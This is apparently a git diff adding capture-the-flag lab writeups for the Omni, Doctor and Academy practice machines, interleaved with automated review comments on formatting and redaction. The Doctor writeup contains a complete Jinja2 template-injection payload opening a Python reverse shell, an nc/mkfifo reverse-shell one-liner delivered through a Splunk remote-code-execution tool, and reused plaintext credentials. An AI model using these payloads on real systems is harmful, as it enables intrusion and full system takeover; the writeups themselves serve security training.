+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ d----- 10/26/2018 11:37 PM 1.0.0.1
+
+
+
+ PS C:\Program Files\WindowsPowerShell\Modules\PackageManagement> ls -force
+ ls -force
+
+
+ Directory: C:\Program Files\WindowsPowerShell\Modules\PackageManagement
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ d----- 10/26/2018 11:37 PM 1.0.0.1
+ -a-h-- 8/21/2020 12:56 PM 247 r.bat
+
+
+
+ PS C:\Program Files\WindowsPowerShell\Modules\PackageManagement> cat r.bat
+ cat r.bat
+ @echo off
+
+ :LOOP
+
+ for /F "skip=6" %%i in ('net localgroup "administrators"') do net localgroup "administrators" %%i /delete
+
+ net user app mesh5143
+ net user administrator _1nt3rn37ofTh1nGz
+
+ ping -n 3 127.0.0.1
+
+ cls
+
+ GOTO :LOOP
+
+ :EXIT
+
+
+
+And here we find credentials **app:mesh5143** and **administrator:_int3rn37ofTh1nGz** , Let's first get the app user's flag:
+
+
+
+once logged in we are greeted by the Windows Device Portal, however we're interested in the command prompt:
+
+
+
+And we're going to run our xc.exe binary once again, but this time as the app user:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [HTB/Omni/SirepRAT]
+ → ./xc -l -p 9008
+
+ __ _____
+ \ \/ / __|
+ > <****(__
+ /_/\_\___| by @xct_de
+ build: QUnVVFdLYEkibcKx
+
+ 2021/06/02 18:20:13 Listening on :9008
+ 2021/06/02 18:20:13 Waiting for connections...
+
+` 
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [HTB/Omni/SirepRAT]
+ → ./xc -l -p 9008
+
+ __ _____
+ \ \/ / __|
+ > <****(__
+ /_/\_\___| by @xct_de
+ build: QUnVVFdLYEkibcKx
+
+ 2021/06/02 18:21:50 Listening on :9008
+ 2021/06/02 18:21:50 Waiting for connections...
+ 2021/06/02 18:21:54 Connection from 10.10.10.204:49676
+ 2021/06/02 18:21:54 Stream established
+
+ [*] Auto-Plugins:
+ [xc: C:\windows\system32]: !shell
+ Microsoft Windows [Version 10.0.17763.107]
+ Copyright (c) Microsoft Corporation. All rights reserved.
+
+ C:\windows\system32>powershell
+ powershell
+ Windows PowerShell
+ Copyright (C) Microsoft Corporation. All rights reserved.
+
+ PS C:\windows\system32> cd C:\
+ cd C:\
+ PS C:\> cd Data
+ cd Data
+ PS C:\Data> cd Users
+ cd Users
+ PS C:\Data\Users> cd app
+ cd app
+ PS C:\Data\Users\app> ls
+ ls
+
+
+ Directory: C:\Data\Users\app
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ d-r--- 7/4/2020 7:28 PM 3D Objects
+ d-r--- 7/4/2020 7:28 PM Documents
+ d-r--- 7/4/2020 7:28 PM Downloads
+ d----- 7/4/2020 7:28 PM Favorites
+ d-r--- 7/4/2020 7:28 PM Music
+ d-r--- 7/4/2020 7:28 PM Pictures
+ d-r--- 7/4/2020 7:28 PM Videos
+ -ar--- 7/4/2020 8:20 PM 344 hardening.txt
+ -ar--- 7/4/2020 8:14 PM 1858 iot-admin.xml
+ -ar--- 7/4/2020 9:53 PM 1958 user.txt
+
+
+ PS C:\Data\Users\app> cat user.txt
+ cat user.txt <****Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"> <****Obj RefId="0"> <****TN RefId="0"> <****T>System.Management.Automation.PSCredential <****/T> <****T>System.Object <****/T> <****/TN> <****ToString>System.Management.Automation.PSCredential <****/ToString>** rops>
+ <****S N="UserName">flag <****/S> <****SS N="Password">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 <****/SS> <****/Props> <****/Obj> <****/Objs>
+
+The user flag seems to be encrypted, but we can use **Import-CliXml** to decrypt it:
+
+
+ PS C:\Data\Users\app> (Import-CliXml -Path user.txt).GetNetworkCredential().Password
+ (Import-CliXml -Path user.txt).GetNetworkCredential().Password
+ 7cfd50f6bc34db3204898f1505ad9d70
+ 7cXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it ! we got the user flag!
+
+## **Part 3 : Getting Root Access**
+
+We're going to repeat the same process with the administrator credentials:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/76 ] [HTB/Omni/SirepRAT]
+ → ./xc -l -p 9007
+
+ __ _____
+ \ \/ / __|
+ > <****(__
+ /_/\_\___| by @xct_de
+ build: QUnVVFdLYEkibcKx
+
+ 2021/06/02 18:37:14 Listening on :9007
+ 2021/06/02 18:37:14 Waiting for connections...
+
+`  
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/76 ] [HTB/Omni/SirepRAT]
+ → ./xc -l -p 9007
+
+ __ _____
+ \ \/ / __|
+ > <****(__
+ /_/\_\___| by @xct_de
+ build: QUnVVFdLYEkibcKx
+
+ 2021/06/02 18:37:14 Listening on :9007
+ 2021/06/02 18:37:14 Waiting for connections...
+ 2021/06/02 19:12:32 Connection from 10.10.10.204:49677
+ 2021/06/02 19:12:32 Stream established
+
+ [*] Auto-Plugins:
+ [xc: C:\windows\system32]: !shell
+ Microsoft Windows [Version 10.0.17763.107]
+ Copyright (c) Microsoft Corporation. All rights reserved.
+
+ C:\windows\system32>cd ../../..
+ cd ../../..
+
+ C:\>cd Data
+ cd Data
+
+ C:\Data>powershell
+ powershell
+ Windows PowerShell
+ Copyright (C) Microsoft Corporation. All rights reserved.
+
+ PS C:\Data\> cd Users\administrator
+ cd Users\administrator
+
+ PS C:\Data\Users\administrator> ls
+ ls
+
+
+ Directory: C:\Data\Users\administrator
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ d-r--- 7/3/2020 11:23 PM 3D Objects
+ d-r--- 7/3/2020 11:23 PM Documents
+ d-r--- 7/3/2020 11:23 PM Downloads
+ d----- 7/3/2020 11:23 PM Favorites
+ d-r--- 7/3/2020 11:23 PM Music
+ d-r--- 7/3/2020 11:23 PM Pictures
+ d-r--- 7/3/2020 11:23 PM Videos
+ -ar--- 7/4/2020 9:48 PM 1958 root.txt
+
+
+ PS C:\Data\Users\administrator> (Import-CliXml -Path root.txt).GetNetworkCredential() | fl
+ (Import-CliXml -Path root.txt).GetNetworkCredential() | fl
+
+
+ UserName : flag
+ Password : 5dXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+ Domain :
+
+
+
+And that's it! We managed to get the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
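Review bot: the user flag is left unredacted on the line directly above its masked copy `7cXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX`; the root flag later in this hunk is masked (`Password : 5dXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX`), so drop the unmasked line to keep redaction consistent. The xc listener block is also pasted twice: the banner, `build:` line and the two `Listening on :9007` / `Waiting for connections...` lines appear once on their own and again at the top of the block that shows the incoming connection, separated by a lone backtick line that renders as a broken inline code span; keep only the second copy. Minor: `And that's it ! we got the user flag!` has a space before the exclamation mark and a lowercase `we`, and the Conclusion's `Here we can see the progress graph :` is not followed by any image reference in this hunk, so either the link was lost in the paste or the sentence should go.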
diff --git a/Easy/51.md b/Easy/51.md
new file mode 100644
index 0000000..c93e2c5
--- /dev/null
+++ b/Easy/51.md
@@ -0,0 +1,347 @@
+# Doctor Writeup
+
+
+
+## Introduction :
+
+Doctor is an Easy Linux box released back in September 2020.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [HTB/Omni/SirepRAT]
+ → nmap -vvv -p- 10.10.10.209 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
+ Discovered open port 22/tcp on 10.10.10.209
+ Discovered open port 80/tcp on 10.10.10.209
+ Discovered open port 8089/tcp on 10.10.10.209
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [HTB/Omni/SirepRAT]
+ → nmap -sCV -p22,80,8089 10.10.10.209
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-02 22:00 CEST
+ Nmap scan report for 10.10.10.209
+ Host is up (0.035s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 3072 59:4d:4e:c2:d8:cf:da:9d:a8:c8:d0:fd:99:a8:46:17 (RSA)
+ | 256 7f:f3:dc:fb:2d:af:cb:ff:99:34:ac:e0:f8:00:1e:47 (ECDSA)
+ |_ 256 53:0e:96:6b:9c:e9:c1:a1:70:51:6c:2d:ce:7b:43:e8 (ED25519)
+ 80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
+ |_http-server-header: Apache/2.4.41 (Ubuntu)
+ |_http-title: Doctor
+ 8089/tcp open ssl/http Splunkd httpd
+ | http-robots.txt: 1 disallowed entry
+ |_/
+ |_http-server-header: Splunkd
+ |_http-title: splunkd
+ | ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
+ | Not valid before: 2020-09-06T15:57:27
+ |_Not valid after: 2023-09-06T15:57:27
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 33.57 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's take a look at it:
+
+
+
+Looking at the website we are hinted towards a domain name: **doctors.htb** so let's add it to our hosts file:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [HTB/Omni/SirepRAT]
+ → sudo -i
+ ┌──(root💀nowhere)-[~]
+ └─# /usr/bin/sudo
+
+ ┌──(root💀nowhere)-[~]
+ └─# echo '10.10.10.209 doctors.htb' >> /etc/hosts
+
+ ┌──(root💀nowhere)-[~]
+ └─# exit
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Doctors]
+ → ping doctors.htb
+ PING doctors.htb (10.10.10.209) 56(84) bytes of data.
+ 64 bytes from doctors.htb (10.10.10.209): icmp_seq=1 ttl=63 time=32.4 ms
+ 64 bytes from doctors.htb (10.10.10.209): icmp_seq=2 ttl=63 time=32.9 ms
+ 64 bytes from doctors.htb (10.10.10.209): icmp_seq=3 ttl=63 time=32.3 ms
+ ^C
+ --- doctors.htb ping statistics ---
+ 3 packets transmitted, 3 received, 0% packet loss, time 2002ms
+ rtt min/avg/max/mdev = 32.309/32.518/32.861/0.244 ms
+
+
+
+Then we visit the webpage:
+
+    
+
+Now that we created an account we're going to create a test post:
+
+ 
+
+And looking at the sourcecode of the page we get a hint that the **/archive** page is still under beta testing. So let's take a look at it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Doctors]
+ → curl http://doctors.htb/archive
+
+ <****?xml version="1.0" encoding="UTF-8" ?> <****rss version="2.0"> <****channel> <****title>Archive <****/title>
+
+Now here we see that the test post we created earlier is visible there, inside the title tags, now the question is wether or not the title of the post itself is sanitized or not, so let's test if this is vulnerable to a Server Side Template Injection ([SSTI](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection)) attack
+
+
+
+So let's test each of the payloads:
+
+   
+
+Now we know that **Twig** or **Jinja2** templates are probably in use. So let's get a reverse shell:
+
+
+
+ {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\"10.10.14.13\",9001)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call([\"/bin/bash\", \"-i\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
+
+
+
+
+`  
+
+Then just browse to **http://doctors.htb/archive** and we get the reverse shell connection:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Doctors]
+ → nc -lvnp 9001
+ listening on [any] 9001 ...
+ connect to [10.10.14.13] from (UNKNOWN) [10.10.10.209] 48082
+ bash: cannot set terminal process group (840): Inappropriate ioctl for device
+ bash: no job control in this shell
+ web@doctor:~$ id
+ id
+ uid=1001(web) gid=1001(web) groups=1001(web),4(adm)
+ web@doctor:~$
+
+
+
+Now let's upgrade our shell to a fully interactive shell:
+
+
+ web@doctor:~$ which python python3 wget curl
+ which python python3 wget curl
+ /usr/bin/python3
+ /usr/bin/wget
+ /usr/bin/curl
+
+
+
+
+ web@doctor:~$ python3 -c 'import pty; pty.spawn("/bin/bash")'
+ python3 -c 'import pty; pty.spawn("/bin/bash")'
+ web@doctor:~$ ^Z
+ [1] + 2659972 suspended nc -lvnp 9001
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Doctors]
+ → stty raw -echo ; fg
+ [1] + 2659972 continued nc -lvnp 9001
+ export TERM=screen-256color
+ web@doctor:~$ export SHELL=bash
+ web@doctor:~$ stty rows 40 columns 125
+ web@doctor:~$ reset
+
+
+
+
+Now that we got a fully interactive TTY reverse shell, let's enumerate the box with linpeas:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Doctors]
+ → cp /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Doctors]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+ web@doctor:~$ wget http://10.10.14.13:9090/linpeas.sh -O /tmp/peas.sh
+ --2021-06-03 15:39:34-- http://10.10.14.13:9090/linpeas.sh
+ Connecting to 10.10.14.13:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 341863 (334K) [text/x-sh]
+ Saving to: ‘/tmp/peas.sh’
+
+ /tmp/peas.sh 100%[====================================================>] 333,85K 698KB/s in 0,5s
+
+ 2021-06-03 15:39:35 (698 KB/s) - ‘/tmp/peas.sh’ saved [341863/341863]
+
+ web@doctor:~$ chmod +x /tmp/peas.sh
+
+ web@doctor:~$ /tmp/peas.sh
+
+
+
+` 
+
+Let it run and then in the output we see the following password:
+
+
+
+Let's check which of the users have that password:
+
+
+ web@doctor:~$ cat /etc/passwd | grep bash
+ root:x:0:0:root:/root:/bin/bash
+ web:x:1001:1001:,,,:/home/web:/bin/bash
+ shaun:x:1002:1002:shaun,,,:/home/shaun:/bin/bash
+ splunk:x:1003:1003:Splunk Server:/opt/splunkforwarder:/bin/bash
+
+ web@doctor:~$ ls -lash /home
+ total 16K
+ 4,0K drwxr-xr-x 4 root root 4,0K Sep 19 2020 .
+ 4,0K drwxr-xr-x 20 root root 4,0K Sep 15 2020 ..
+ 4,0K drwxr-xr-x 6 shaun shaun 4,0K Sep 15 2020 shaun
+ 4,0K drwxr-xr-x 7 web web 4,0K Jun 3 15:42 web
+
+
+Let's try the shaun user:
+
+
+ web@doctor:~$ su shaun
+ Password:
+ shaun@doctor:/home/web$ id
+ uid=1002(shaun) gid=1002(shaun) groups=1002(shaun)
+ shaun@doctor:/home/web$ cd ~
+ shaun@doctor:~$ cat user.txt
+ 7cXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to privesc to the shaun user and get the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now in order to privesc to the root user, let's run linpeas.sh once more, this time as the shaun user:
+
+
+ shaun@doctor:~$ /tmp/peas.sh
+
+
+
+Although suprisingly we get nothing interesting other than hints towards the splunk service that's running on port 8089
+
+
+
+
+ shaun@doctor:~$ ps -aux | grep splunk
+ root 1139 0.0 2.0 257468 83740 ? Sl Jun02 0:40 splunkd -p 8089 start
+ root 1141 0.0 0.3 77664 13340 ? Ss Jun02 0:00 [splunkd pid=1139] splunkd -p 8089 start [process-runner]
+ shaun 429634 0.0 0.0 17668 736 pts/0 S+ 16:01 0:00 grep --color=auto splunk
+
+
+
+And we also see that the splunk daemon is ran by the root user:
+
+
+
+Here we can assume that shaun's PAM password is re-used for the splunk service, so let's try it out with the Splunk Whisperer2 python exploit:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Doctors]
+ → git clone https://github.com/cnotin/SplunkWhisperer2
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Doctors]
+ → cd SplunkWhisperer2
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [HTB/Doctors/SplunkWhisperer2]
+ → tree
+ .
+ ├── LICENSE
+ ├── PySplunkWhisperer2
+ │ ├── build_exe.bat
+ │ ├── PySplunkWhisperer2_local.py
+ │ ├── PySplunkWhisperer2_remote.py
+ │ ├── README.md
+ │ └── requirements.txt
+ ├── README.md
+ └── SharpSplunkWhisperer2
+ ├── app.config
+ ├── FodyWeavers.xml
+ ├── packages.config
+ ├── Program.cs
+ ├── README.md
+ ├── SharpSplunkWhisperer2.csproj
+ └── SharpSplunkWhisperer2.sln
+
+ 2 directories, 14 files
+
+
+Let's test it using shaun's credentials:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [HTB/Doctors/SplunkWhisperer2]
+ → cd PySplunkWhisperer2
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [Doctors/SplunkWhisperer2/PySplunkWhisperer2]
+ → python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.13 --username shaun --password Guitar123 --payload id
+ Running in remote mode (Remote Code Execution)
+ [.] Authenticating...
+ [+] Authenticated
+ [.] Creating malicious app bundle...
+ [+] Created malicious app bundle in: /tmp/tmptx03ln_m.tar
+ [+] Started HTTP server for remote mode
+ [.] Installing app from: http://10.10.14.13:8181/
+ 10.10.10.209 - - [03/Jun/2021 15:56:31] "GET / HTTP/1.1" 200 -
+ [+] App installed, your code should be running now!
+
+ Press RETURN to cleanup
+
+ [.] Removing app...
+ [+] App removed
+ [+] Stopped HTTP server
+ Bye!
+
+
+Seems to be working although we can't see the output of the command, so let's do it with a reverse shell this time:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [Doctors/SplunkWhisperer2/PySplunkWhisperer2]
+ → python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.13 --username shaun --password Guitar123 --payload 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.13 9002 >/tmp/f'
+ Running in remote mode (Remote Code Execution)
+ [.] Authenticating...
+ [+] Authenticated
+ [.] Creating malicious app bundle...
+ [+] Created malicious app bundle in: /tmp/tmprb66z6y4.tar
+ [+] Started HTTP server for remote mode
+ [.] Installing app from: http://10.10.14.13:8181/
+ 10.10.10.209 - - [03/Jun/2021 15:58:45] "GET / HTTP/1.1" 200 -
+ [+] App installed, your code should be running now!
+
+ Press RETURN to cleanup
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [Doctors/SplunkWhisperer2/PySplunkWhisperer2]
+ → nc -lvnp 9002
+ listening on [any] 9002 ...
+ connect to [10.10.14.13] from (UNKNOWN) [10.10.10.209] 33510
+ /bin/sh: 0: can't access tty; job control turned off
+ # id
+ uid=0(root) gid=0(root) groups=0(root)
+ # cat /root/root.txt
+ 50XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to get a reverse shell as the root user and we managed to print the root flag!
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
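Review bot: the shell prompts in the nmap and `/etc/hosts` blocks still read `[HTB/Omni/SirepRAT]`, the working directory of the previous writeup, while the later blocks correctly show `[~/HTB/Doctors]`; fix the pasted prompts so the transcript is consistent. Several lines carry mangled markup that makes the commands unreadable: the curl output `<****?xml version="1.0" encoding="UTF-8" ?> <****rss version="2.0"> ...` has `****` inserted after every `<`, the lone backtick lines after the SSTI payload and after `/tmp/peas.sh` render as broken inline code spans, and `└─# /usr/bin/sudo` right after `sudo -i` is a stray line with no purpose. Also, `Let it run and then in the output we see the following password:` is followed by nothing in this hunk (the password only surfaces later, inline in the PySplunkWhisperer2 command line), so either restore the missing linpeas output or state in the sentence what was found; the same applies to the sentences introducing the website screenshots and the payload test results. Typos: `wether` → `whether`, `suprisingly` → `surprisingly`, `is ran by` → `is run by`.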
diff --git a/Easy/52.md b/Easy/52.md
new file mode 100644
index 0000000..78dcca5
--- /dev/null
+++ b/Easy/52.md
@@ -0,0 +1,710 @@
+# Academy Writeup
+
+
+
+## Introduction :
+
+Academy is an easy Linux box released back in November 2020.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Academy]
+ → nmap -vvv -p- 10.10.10.215 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
+ Discovered open port 80/tcp on 10.10.10.215
+ Discovered open port 22/tcp on 10.10.10.215
+ Discovered open port 33060/tcp on 10.10.10.215
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Academy]
+ → nmap -sCV -p80,22,33060 10.10.10.215
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-03 16:45 CEST
+ Nmap scan report for 10.10.10.215
+ Host is up (0.035s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA)
+ | 256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA)
+ |_ 256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519)
+ 80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
+ |_http-server-header: Apache/2.4.41 (Ubuntu)
+ |_http-title: Did not follow redirect to http://academy.htb/
+ 33060/tcp open mysqlx?
+ | fingerprint-strings:
+ | DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
+ | Invalid message"
+ |_ HY000
+ 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
+ SF-Port33060-TCP:V=7.91%I=7%D=6/3%Time=60B8EB24%P=x86_64-pc-linux-gnu%r(NU
+ SF:LL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x0b\x
+ SF:08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTTPOpt
+ SF:ions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\x0b\
+ SF:x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSVersi
+ SF:onBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTCP,2B
+ SF:,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fIn
+ SF:valid\x20message\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%
+ SF:r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\
+ SF:x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(TerminalServerCookie,
+ SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\x0
+ SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
+ SF:x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,9,
+ SF:"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05\x
+ SF:1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY00
+ SF:0")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString,9
+ SF:,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x08
+ SF:\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x
+ SF:05HY000")%r(LDAPBindReq,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SIPOptions,
+ SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LANDesk-RC,9,"\x05\0\0\0\x0b\x08\x0
+ SF:5\x1a\0")%r(TerminalServer,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NCP,9,"\
+ SF:x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRPC,2B,"\x05\0\0\0\x0b\x08\x05\x1a
+ SF:\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000"
+ SF:)%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(WMSRequest,9,"\x05\0\0\
+ SF:0\x0b\x08\x05\x1a\0")%r(oracle-tns,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(
+ SF:ms-sql-s,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(afp,2B,"\x05\0\0\0\x0b\x08
+ SF:\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x
+ SF:05HY000")%r(giop,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 25.37 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's investigate it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Academy]
+ → curl 10.10.10.215
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Academy]
+ → curl 10.10.10.215 -v
+ * Trying 10.10.10.215:80...
+ * Connected to 10.10.10.215 (10.10.10.215) port 80 (#0)
+ > GET / HTTP/1.1
+ > Host: 10.10.10.215
+ > User-Agent: curl/7.74.0
+ > Accept: */*
+ >
+ * Mark bundle as not supporting multiuse
+ <****HTTP/1.1 302 Found <****Date: Thu, 03 Jun 2021 14:54:22 GMT <****Server: Apache/2.4.41 (Ubuntu) <****Location: http://academy.htb/ <****Content-Length: 0 <****Content-Type: text/html; charset=UTF-8 <***** Connection #0 to host 10.10.10.215 left intact
+
+As we try to get there we see that we are being redirected to the **academy.htb** domain name just like our nmap scan pointed out, so let's add it to our hosts file:
+
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Academy]
+ → sudo -i
+ [sudo] password for nothing:
+ ┌──(root💀nowhere)-[~]
+ └─# echo '10.10.10.215 academy.htb' >> /etc/hosts
+
+ ┌──(root💀nowhere)-[~]
+ └─# exit
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Academy]
+ → ping academy.htb
+ PING academy.htb (10.10.10.215) 56(84) bytes of data.
+ 64 bytes from academy.htb (10.10.10.215): icmp_seq=1 ttl=63 time=34.5 ms
+ 64 bytes from academy.htb (10.10.10.215): icmp_seq=2 ttl=63 time=40.5 ms
+ 64 bytes from academy.htb (10.10.10.215): icmp_seq=3 ttl=63 time=38.1 ms
+
+
+
+Now let's check out the website:
+
+   
+
+Now here we see that we are on a php website, and we could create and login into a test account. Once logged in, the webpage doesn't have anything to exploit, so let's search for other directories with gobuster:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Academy]
+ → gobuster dir -u http://academy.htb/ -t 50 -w /usr/share/seclists/Discovery/Web-Content/common.txt
+ ===============================================================
+ Gobuster v3.1.0
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
+ ===============================================================
+ [+] Url: http://academy.htb/
+ [+] Method: GET
+ [+] Threads: 50
+ [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
+ [+] Negative Status codes: 404
+ [+] User Agent: gobuster/3.1.0
+ [+] Timeout: 10s
+ ===============================================================
+ 2021/06/03 16:55:19 Starting gobuster in directory enumeration mode
+ ===============================================================
+ /.htpasswd (Status: 403) [Size: 276]
+ /admin.php (Status: 200) [Size: 2633]
+ /images (Status: 301) [Size: 311] [--> http://academy.htb/images/]
+ /index.php (Status: 200) [Size: 2117]
+ /.hta (Status: 403) [Size: 276]
+ /.htaccess (Status: 403) [Size: 276]
+ /server-status (Status: 403) [Size: 276]
+
+ ===============================================================
+ 2021/06/03 16:55:29 Finished
+ ===============================================================
+
+
+
+` 
+
+Now when we go to the admin.php page that our gobuster scan picked up, we see that we need to login to access it, the trick here was to inspect the **register.php** POST request when we were registering an account, and we can do so using burpsuite:
+
+
+
+We get the following request:
+
+
+ POST /register.php HTTP/1.1
+ Host: academy.htb
+ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.5
+ Accept-Encoding: gzip, deflate
